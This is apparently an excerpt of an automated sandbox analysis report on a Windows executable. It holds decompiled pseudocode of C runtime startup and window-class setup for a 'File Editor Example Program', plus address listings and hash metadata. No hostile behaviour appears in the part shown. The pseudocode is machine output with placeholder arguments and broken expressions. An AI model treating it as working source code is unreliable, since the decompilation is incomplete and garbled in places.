                                                                                                                                                                                                                                                                                                        								_v140 = 0x1f;
                                                                                                                                                                                                                                                                                                        								L0040EE70();
                                                                                                                                                                                                                                                                                                        								_t84 =  *0x422484; // 0x2
                                                                                                                                                                                                                                                                                                        								if(_t84 != 1) {
                                                                                                                                                                                                                                                                                                        									L10:
                                                                                                                                                                                                                                                                                                        									if(_t86 == 0) {
                                                                                                                                                                                                                                                                                                        										goto L37;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									L36:
                                                                                                                                                                                                                                                                                                        									_v136 = 0x42c008;
                                                                                                                                                                                                                                                                                                        									_v140 = 0x42c000;
                                                                                                                                                                                                                                                                                                        									L0040EE78();
                                                                                                                                                                                                                                                                                                        									 *0x422484 = 2;
                                                                                                                                                                                                                                                                                                        									if(_t86 == 0) {
                                                                                                                                                                                                                                                                                                        										L37:
                                                                                                                                                                                                                                                                                                        										InterlockedExchange(0x422480, 0);
                                                                                                                                                                                                                                                                                                        										_t122 = _t122 - 8;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							L43:
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							Sleep(0x3e8);
                                                                                                                                                                                                                                                                                                        							_t121 = _t122 - 4;
                                                                                                                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                                                                                                                        						_t57 =  *0x420a80; // 0x40ca60
                                                                                                                                                                                                                                                                                                        						if(_t57 != 0) {
                                                                                                                                                                                                                                                                                                        							_v132 = 0;
                                                                                                                                                                                                                                                                                                        							_v136 = 2;
                                                                                                                                                                                                                                                                                                        							_v140 = 0;
                                                                                                                                                                                                                                                                                                        							 *_t57();
                                                                                                                                                                                                                                                                                                        							_t122 = _t122 - 0xc; // executed
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						E0040D0C0(_t86, _t105, _t109); // executed
                                                                                                                                                                                                                                                                                                        						_v140 = E0040CC00; // executed
                                                                                                                                                                                                                                                                                                        						_t59 = SetUnhandledExceptionFilter(??); // executed
                                                                                                                                                                                                                                                                                                        						_t123 = _t122 - 4;
                                                                                                                                                                                                                                                                                                        						 *0x422064 = _t59;
                                                                                                                                                                                                                                                                                                        						 *_t123 = 0x401000;
                                                                                                                                                                                                                                                                                                        						E0040D3A0(E0040EE40());
                                                                                                                                                                                                                                                                                                        						 *0x422474 = 0x400000;
                                                                                                                                                                                                                                                                                                        						_t63 =  *_acmdln;
                                                                                                                                                                                                                                                                                                        						if(_acmdln != 0) {
                                                                                                                                                                                                                                                                                                        							_t96 = 0;
                                                                                                                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                                                                                                                        								_t100 =  *_t63 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        								if(_t100 <= 0x20) {
                                                                                                                                                                                                                                                                                                        									goto L15;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								L20:
                                                                                                                                                                                                                                                                                                        								_t86 = _t96 ^ 0x00000001;
                                                                                                                                                                                                                                                                                                        								_t96 =  ==  ? _t96 ^ 0x00000001 : _t96;
                                                                                                                                                                                                                                                                                                        								L18:
                                                                                                                                                                                                                                                                                                        								_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                                                                                        								_t100 =  *_t63 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        								if(_t100 <= 0x20) {
                                                                                                                                                                                                                                                                                                        									goto L15;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								goto L24;
                                                                                                                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                                                                                                                        								if(_t100 != 0) {
                                                                                                                                                                                                                                                                                                        									if(_t96 == 0) {
                                                                                                                                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                                                                                                                                        											_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                                                                                        											_t101 =  *_t63 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        											if(_t101 > 0x20) {
                                                                                                                                                                                                                                                                                                        												goto L23;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											if(_t101 != 0) {
                                                                                                                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											goto L23;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t96 = 1;
                                                                                                                                                                                                                                                                                                        										goto L18;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								L23:
                                                                                                                                                                                                                                                                                                        								 *0x422470 = _t63;
                                                                                                                                                                                                                                                                                                        								goto L24;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						L24:
                                                                                                                                                                                                                                                                                                        						_t106 =  *0x422054; // 0x1
                                                                                                                                                                                                                                                                                                        						if(_t106 != 0) {
                                                                                                                                                                                                                                                                                                        							_t81 =  !=  ? _v48 & 0x0000ffff : 0xa;
                                                                                                                                                                                                                                                                                                        							 *0x41a000 =  !=  ? _v48 & 0x0000ffff : 0xa;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t64 =  *0x42201c; // 0x1
                                                                                                                                                                                                                                                                                                        						_v116 = _t64;
                                                                                                                                                                                                                                                                                                        						_t65 = 4 + _t64 * 4;
                                                                                                                                                                                                                                                                                                        						_v120 = _t65;
                                                                                                                                                                                                                                                                                                        						 *_t123 = _t65;
                                                                                                                                                                                                                                                                                                        						_t66 = malloc(??);
                                                                                                                                                                                                                                                                                                        						_t102 =  *0x422018; // 0xe71260
                                                                                                                                                                                                                                                                                                        						_v112 = _t66;
                                                                                                                                                                                                                                                                                                        						if(_t64 <= 0) {
                                                                                                                                                                                                                                                                                                        							_t67 = 0;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t90 = 0;
                                                                                                                                                                                                                                                                                                        							_t114 = _t102;
                                                                                                                                                                                                                                                                                                        							do {
                                                                                                                                                                                                                                                                                                        								 *_t123 =  *(_t114 + _t90 * 4);
                                                                                                                                                                                                                                                                                                        								_t27 = strlen(??) + 1; // 0x1
                                                                                                                                                                                                                                                                                                        								_t102 = _t27;
                                                                                                                                                                                                                                                                                                        								 *_t123 = _t102;
                                                                                                                                                                                                                                                                                                        								_t77 = malloc(??);
                                                                                                                                                                                                                                                                                                        								 *(_v112 + _t90 * 4) = _t77;
                                                                                                                                                                                                                                                                                                        								_t95 =  *(_t114 + _t90 * 4);
                                                                                                                                                                                                                                                                                                        								_t90 = _t90 + 1;
                                                                                                                                                                                                                                                                                                        								_v136 = _t102;
                                                                                                                                                                                                                                                                                                        								 *_t123 = _t77;
                                                                                                                                                                                                                                                                                                        								_v140 = _t95;
                                                                                                                                                                                                                                                                                                        								memcpy(??, ??, ??);
                                                                                                                                                                                                                                                                                                        							} while (_t90 != _v116);
                                                                                                                                                                                                                                                                                                        							_t67 = _v120 - 4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t111 = _v112;
                                                                                                                                                                                                                                                                                                        						 *(_t111 + _t67) = 0;
                                                                                                                                                                                                                                                                                                        						 *0x422018 = _t111;
                                                                                                                                                                                                                                                                                                        						E0040D430();
                                                                                                                                                                                                                                                                                                        						_t98 =  *0x422014; // 0xe714b8
                                                                                                                                                                                                                                                                                                        						 *__imp____initenv = _t98;
                                                                                                                                                                                                                                                                                                        						_t70 =  *0x422014; // 0xe714b8
                                                                                                                                                                                                                                                                                                        						_v136 = _t70;
                                                                                                                                                                                                                                                                                                        						_t71 =  *0x422018; // 0xe71260
                                                                                                                                                                                                                                                                                                        						_v140 = _t71;
                                                                                                                                                                                                                                                                                                        						_t72 =  *0x42201c; // 0x1
                                                                                                                                                                                                                                                                                                        						 *_t123 = _t72; // executed
                                                                                                                                                                                                                                                                                                        						_t73 = E00419090();
                                                                                                                                                                                                                                                                                                        						_t112 =  *0x422008; // 0x0
                                                                                                                                                                                                                                                                                                        						 *0x42200c = _t73;
                                                                                                                                                                                                                                                                                                        						if(_t112 == 0) {
                                                                                                                                                                                                                                                                                                        							 *_t123 = _t73;
                                                                                                                                                                                                                                                                                                        							exit(??);
                                                                                                                                                                                                                                                                                                        							_t108 = _t112;
                                                                                                                                                                                                                                                                                                        							 *0x422054 = 1;
                                                                                                                                                                                                                                                                                                        							E0040D450();
                                                                                                                                                                                                                                                                                                        							_t117 = _t123 - 0xc + 0xc;
                                                                                                                                                                                                                                                                                                        							goto L1;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t88 =  *0x422004; // 0x0
                                                                                                                                                                                                                                                                                                        						if(_t88 == 0) {
                                                                                                                                                                                                                                                                                                        							L0040EE68();
                                                                                                                                                                                                                                                                                                        							_t73 =  *0x42200c; // 0x0
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						return _t73;
                                                                                                                                                                                                                                                                                                        						goto L43;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t85 =  *0x422484; // 0x2
                                                                                                                                                                                                                                                                                                        					_t86 = 0;
                                                                                                                                                                                                                                                                                                        					if(_t85 == 1) {
                                                                                                                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}





























































                                                                                                                                                                                                                                                                                                        0x00401180
                                                                                                                                                                                                                                                                                                        0x00401180
                                                                                                                                                                                                                                                                                                        0x00401180
                                                                                                                                                                                                                                                                                                        0x00401183
                                                                                                                                                                                                                                                                                                        0x0040118a
                                                                                                                                                                                                                                                                                                        0x0040118b
                                                                                                                                                                                                                                                                                                        0x0040118c
                                                                                                                                                                                                                                                                                                        0x00401195
                                                                                                                                                                                                                                                                                                        0x00401199
                                                                                                                                                                                                                                                                                                        0x004011a4
                                                                                                                                                                                                                                                                                                        0x004011a7
                                                                                                                                                                                                                                                                                                        0x004011ad
                                                                                                                                                                                                                                                                                                        0x004011b4
                                                                                                                                                                                                                                                                                                        0x004011bb
                                                                                                                                                                                                                                                                                                        0x004011c2
                                                                                                                                                                                                                                                                                                        0x004011c9
                                                                                                                                                                                                                                                                                                        0x004011d0
                                                                                                                                                                                                                                                                                                        0x004011d7
                                                                                                                                                                                                                                                                                                        0x004011de
                                                                                                                                                                                                                                                                                                        0x004011e1
                                                                                                                                                                                                                                                                                                        0x004011e8
                                                                                                                                                                                                                                                                                                        0x00401493
                                                                                                                                                                                                                                                                                                        0x00401499
                                                                                                                                                                                                                                                                                                        0x00401499
                                                                                                                                                                                                                                                                                                        0x004011f4
                                                                                                                                                                                                                                                                                                        0x004011fa
                                                                                                                                                                                                                                                                                                        0x004011fd
                                                                                                                                                                                                                                                                                                        0x00401219
                                                                                                                                                                                                                                                                                                        0x0040122c
                                                                                                                                                                                                                                                                                                        0x0040122e
                                                                                                                                                                                                                                                                                                        0x00401233
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401207
                                                                                                                                                                                                                                                                                                        0x00401420
                                                                                                                                                                                                                                                                                                        0x00401425
                                                                                                                                                                                                                                                                                                        0x0040142d
                                                                                                                                                                                                                                                                                                        0x00401245
                                                                                                                                                                                                                                                                                                        0x00401245
                                                                                                                                                                                                                                                                                                        0x0040124c
                                                                                                                                                                                                                                                                                                        0x004014a1
                                                                                                                                                                                                                                                                                                        0x004014ab
                                                                                                                                                                                                                                                                                                        0x004014b3
                                                                                                                                                                                                                                                                                                        0x004014ba
                                                                                                                                                                                                                                                                                                        0x00401252
                                                                                                                                                                                                                                                                                                        0x00401252
                                                                                                                                                                                                                                                                                                        0x00401252
                                                                                                                                                                                                                                                                                                        0x0040125c
                                                                                                                                                                                                                                                                                                        0x00401264
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401433
                                                                                                                                                                                                                                                                                                        0x00401433
                                                                                                                                                                                                                                                                                                        0x00401433
                                                                                                                                                                                                                                                                                                        0x0040143a
                                                                                                                                                                                                                                                                                                        0x0040143f
                                                                                                                                                                                                                                                                                                        0x00401447
                                                                                                                                                                                                                                                                                                        0x0040126a
                                                                                                                                                                                                                                                                                                        0x0040126c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040144d
                                                                                                                                                                                                                                                                                                        0x0040144d
                                                                                                                                                                                                                                                                                                        0x0040144d
                                                                                                                                                                                                                                                                                                        0x00401455
                                                                                                                                                                                                                                                                                                        0x0040145c
                                                                                                                                                                                                                                                                                                        0x00401463
                                                                                                                                                                                                                                                                                                        0x0040146d
                                                                                                                                                                                                                                                                                                        0x00401473
                                                                                                                                                                                                                                                                                                        0x00401482
                                                                                                                                                                                                                                                                                                        0x00401488
                                                                                                                                                                                                                                                                                                        0x00401488
                                                                                                                                                                                                                                                                                                        0x0040146d
                                                                                                                                                                                                                                                                                                        0x00401447
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040120d
                                                                                                                                                                                                                                                                                                        0x00401214
                                                                                                                                                                                                                                                                                                        0x00401216
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401216
                                                                                                                                                                                                                                                                                                        0x00401272
                                                                                                                                                                                                                                                                                                        0x00401272
                                                                                                                                                                                                                                                                                                        0x00401279
                                                                                                                                                                                                                                                                                                        0x0040127b
                                                                                                                                                                                                                                                                                                        0x00401283
                                                                                                                                                                                                                                                                                                        0x0040128b
                                                                                                                                                                                                                                                                                                        0x00401292
                                                                                                                                                                                                                                                                                                        0x00401294
                                                                                                                                                                                                                                                                                                        0x00401294
                                                                                                                                                                                                                                                                                                        0x00401297
                                                                                                                                                                                                                                                                                                        0x0040129c
                                                                                                                                                                                                                                                                                                        0x004012a3
                                                                                                                                                                                                                                                                                                        0x004012a9
                                                                                                                                                                                                                                                                                                        0x004012ac
                                                                                                                                                                                                                                                                                                        0x004012b1
                                                                                                                                                                                                                                                                                                        0x004012bd
                                                                                                                                                                                                                                                                                                        0x004012c7
                                                                                                                                                                                                                                                                                                        0x004012d1
                                                                                                                                                                                                                                                                                                        0x004012d5
                                                                                                                                                                                                                                                                                                        0x004012d7
                                                                                                                                                                                                                                                                                                        0x004012f0
                                                                                                                                                                                                                                                                                                        0x004012f0
                                                                                                                                                                                                                                                                                                        0x004012f6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004012f8
                                                                                                                                                                                                                                                                                                        0x004012fa
                                                                                                                                                                                                                                                                                                        0x00401300
                                                                                                                                                                                                                                                                                                        0x004012ed
                                                                                                                                                                                                                                                                                                        0x004012ed
                                                                                                                                                                                                                                                                                                        0x004012f0
                                                                                                                                                                                                                                                                                                        0x004012f6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004012e0
                                                                                                                                                                                                                                                                                                        0x004012e2
                                                                                                                                                                                                                                                                                                        0x004012e6
                                                                                                                                                                                                                                                                                                        0x00401309
                                                                                                                                                                                                                                                                                                        0x00401309
                                                                                                                                                                                                                                                                                                        0x0040130c
                                                                                                                                                                                                                                                                                                        0x00401312
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401307
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401307
                                                                                                                                                                                                                                                                                                        0x004012e8
                                                                                                                                                                                                                                                                                                        0x004012e8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004012e8
                                                                                                                                                                                                                                                                                                        0x004012e6
                                                                                                                                                                                                                                                                                                        0x00401314
                                                                                                                                                                                                                                                                                                        0x00401314
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401314
                                                                                                                                                                                                                                                                                                        0x004012f0
                                                                                                                                                                                                                                                                                                        0x00401319
                                                                                                                                                                                                                                                                                                        0x00401319
                                                                                                                                                                                                                                                                                                        0x00401321
                                                                                                                                                                                                                                                                                                        0x00401330
                                                                                                                                                                                                                                                                                                        0x00401333
                                                                                                                                                                                                                                                                                                        0x00401333
                                                                                                                                                                                                                                                                                                        0x00401338
                                                                                                                                                                                                                                                                                                        0x0040133d
                                                                                                                                                                                                                                                                                                        0x00401342
                                                                                                                                                                                                                                                                                                        0x00401349
                                                                                                                                                                                                                                                                                                        0x0040134c
                                                                                                                                                                                                                                                                                                        0x0040134f
                                                                                                                                                                                                                                                                                                        0x00401356
                                                                                                                                                                                                                                                                                                        0x0040135c
                                                                                                                                                                                                                                                                                                        0x0040135f
                                                                                                                                                                                                                                                                                                        0x004014c4
                                                                                                                                                                                                                                                                                                        0x00401365
                                                                                                                                                                                                                                                                                                        0x00401365
                                                                                                                                                                                                                                                                                                        0x00401367
                                                                                                                                                                                                                                                                                                        0x00401370
                                                                                                                                                                                                                                                                                                        0x00401373
                                                                                                                                                                                                                                                                                                        0x0040137b
                                                                                                                                                                                                                                                                                                        0x0040137b
                                                                                                                                                                                                                                                                                                        0x0040137e
                                                                                                                                                                                                                                                                                                        0x00401381
                                                                                                                                                                                                                                                                                                        0x00401389
                                                                                                                                                                                                                                                                                                        0x0040138c
                                                                                                                                                                                                                                                                                                        0x0040138f
                                                                                                                                                                                                                                                                                                        0x00401392
                                                                                                                                                                                                                                                                                                        0x00401396
                                                                                                                                                                                                                                                                                                        0x00401399
                                                                                                                                                                                                                                                                                                        0x0040139d
                                                                                                                                                                                                                                                                                                        0x004013a2
                                                                                                                                                                                                                                                                                                        0x004013aa
                                                                                                                                                                                                                                                                                                        0x004013aa
                                                                                                                                                                                                                                                                                                        0x004013ad
                                                                                                                                                                                                                                                                                                        0x004013b0
                                                                                                                                                                                                                                                                                                        0x004013b7
                                                                                                                                                                                                                                                                                                        0x004013bd
                                                                                                                                                                                                                                                                                                        0x004013c7
                                                                                                                                                                                                                                                                                                        0x004013cd
                                                                                                                                                                                                                                                                                                        0x004013cf
                                                                                                                                                                                                                                                                                                        0x004013d4
                                                                                                                                                                                                                                                                                                        0x004013d8
                                                                                                                                                                                                                                                                                                        0x004013dd
                                                                                                                                                                                                                                                                                                        0x004013e1
                                                                                                                                                                                                                                                                                                        0x004013e6
                                                                                                                                                                                                                                                                                                        0x004013e9
                                                                                                                                                                                                                                                                                                        0x004013ee
                                                                                                                                                                                                                                                                                                        0x004013f6
                                                                                                                                                                                                                                                                                                        0x004013fb
                                                                                                                                                                                                                                                                                                        0x004014cb
                                                                                                                                                                                                                                                                                                        0x004014d0
                                                                                                                                                                                                                                                                                                        0x004014d5
                                                                                                                                                                                                                                                                                                        0x004014e3
                                                                                                                                                                                                                                                                                                        0x004014ed
                                                                                                                                                                                                                                                                                                        0x004014f2
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004014f2
                                                                                                                                                                                                                                                                                                        0x00401401
                                                                                                                                                                                                                                                                                                        0x00401409
                                                                                                                                                                                                                                                                                                        0x0040140b
                                                                                                                                                                                                                                                                                                        0x00401410
                                                                                                                                                                                                                                                                                                        0x00401410
                                                                                                                                                                                                                                                                                                        0x0040141c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040141c
                                                                                                                                                                                                                                                                                                        0x00401235
                                                                                                                                                                                                                                                                                                        0x0040123a
                                                                                                                                                                                                                                                                                                        0x0040123f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040123f

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: malloc$CompareExceptionExchangeFilterInfoInterlockedSleepStartupUnhandledmemcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 52093863-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 14d5eb7bf9b79b84294aa7e0ba2b3a6fb8049dbdddb5457babaf65cc5e7f2071
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8e4e66b0b0a685f907c53a036abd111b35ec28aa5b749cb82d3d57855afc03b1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 14d5eb7bf9b79b84294aa7e0ba2b3a6fb8049dbdddb5457babaf65cc5e7f2071
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 259191B1A04301CFD720EF69DA8075A7BF4FB44304F81493ED984AB3A1D7B89845CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 22%
                                                                                                                                                                                                                                                                                                        			E00402075(struct HINSTANCE__* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v32;
                                                                                                                                                                                                                                                                                                        				struct HWND__** _v36;
                                                                                                                                                                                                                                                                                                        				struct HWND__** _v40;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v44;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v64;
                                                                                                                                                                                                                                                                                                        				char _v72;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v76;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v80;
                                                                                                                                                                                                                                                                                                        				struct _WNDCLASSEXA _v128;
                                                                                                                                                                                                                                                                                                        				char _v160;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v164;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v168;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v188;
                                                                                                                                                                                                                                                                                                        				char _v192;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v196;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v228;
                                                                                                                                                                                                                                                                                                        				struct HINSTANCE__* _v232;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v236;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v240;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v244;
                                                                                                                                                                                                                                                                                                        				CHAR* _v248;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v252;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v256;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v260;
                                                                                                                                                                                                                                                                                                        				CHAR* _v264;
                                                                                                                                                                                                                                                                                                        				CHAR* _v268;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v272;
                                                                                                                                                                                                                                                                                                        				struct HWND__** _v276;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v288;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v292;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v296;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t92;
                                                                                                                                                                                                                                                                                                        				struct HICON__* _t102;
                                                                                                                                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _t109;
                                                                                                                                                                                                                                                                                                        				int _t112;
                                                                                                                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _t139;
                                                                                                                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t152;
                                                                                                                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                                                                                                                        				struct HWND__*** _t158;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t160;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t161;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t162;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t152 = _t151 - 0xec;
                                                                                                                                                                                                                                                                                                        				_v168 = E00418AA0;
                                                                                                                                                                                                                                                                                                        				_v164 = 0x41910c;
                                                                                                                                                                                                                                                                                                        				_t92 =  &_v160;
                                                                                                                                                                                                                                                                                                        				_t149 =  &_v28;
                                                                                                                                                                                                                                                                                                        				 *_t92 =  &_v28;
                                                                                                                                                                                                                                                                                                        				_t150 = E00402410;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t92 + 4)) = E00402410;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t92 + 8)) = _t152;
                                                                                                                                                                                                                                                                                                        				E0040E1A0( &_v28, E00402410,  &_v192);
                                                                                                                                                                                                                                                                                                        				_v128.cbSize = 0x30;
                                                                                                                                                                                                                                                                                                        				_v128.style = 0;
                                                                                                                                                                                                                                                                                                        				_v128.lpfnWndProc = E00401A9C;
                                                                                                                                                                                                                                                                                                        				_v128.cbClsExtra = 0;
                                                                                                                                                                                                                                                                                                        				_v128.cbWndExtra = 0;
                                                                                                                                                                                                                                                                                                        				_v128.hInstance = _a4;
                                                                                                                                                                                                                                                                                                        				_v248 = 0x7f00;
                                                                                                                                                                                                                                                                                                        				_v252 = 0;
                                                                                                                                                                                                                                                                                                        				_v188 = 1;
                                                                                                                                                                                                                                                                                                        				_v128.hIcon = LoadIconA(??, ??);
                                                                                                                                                                                                                                                                                                        				_v128.hCursor = LoadCursorA(0, 0x7f00);
                                                                                                                                                                                                                                                                                                        				_v128.hbrBackground = 6;
                                                                                                                                                                                                                                                                                                        				_v128.lpszMenuName = "MAINMENU";
                                                                                                                                                                                                                                                                                                        				_v128.lpszClassName = "WindowClass";
                                                                                                                                                                                                                                                                                                        				_t102 = LoadIconA(_a4, 0x41f0eb); // executed
                                                                                                                                                                                                                                                                                                        				_v128.hIconSm = _t102;
                                                                                                                                                                                                                                                                                                        				_t105 = RegisterClassExA( &_v128);
                                                                                                                                                                                                                                                                                                        				_t156 = _t152 - 0xfffffffffffffff4;
                                                                                                                                                                                                                                                                                                        				if((_t105 & 0xffffff00 | _t105 == 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                                        					_v228 = 0;
                                                                                                                                                                                                                                                                                                        					_v232 = _a4;
                                                                                                                                                                                                                                                                                                        					_v236 = 0;
                                                                                                                                                                                                                                                                                                        					_v240 = 0;
                                                                                                                                                                                                                                                                                                        					_v244 = 0xf0;
                                                                                                                                                                                                                                                                                                        					_v248 = 0x140;
                                                                                                                                                                                                                                                                                                        					_v252 = 0x80000000;
                                                                                                                                                                                                                                                                                                        					_v256 = 0x80000000;
                                                                                                                                                                                                                                                                                                        					_v260 = 0xcf0000;
                                                                                                                                                                                                                                                                                                        					_v264 = "File Editor Example Program";
                                                                                                                                                                                                                                                                                                        					_v268 = "WindowClass";
                                                                                                                                                                                                                                                                                                        					_v272 = 0x200;
                                                                                                                                                                                                                                                                                                        					_v188 = 1;
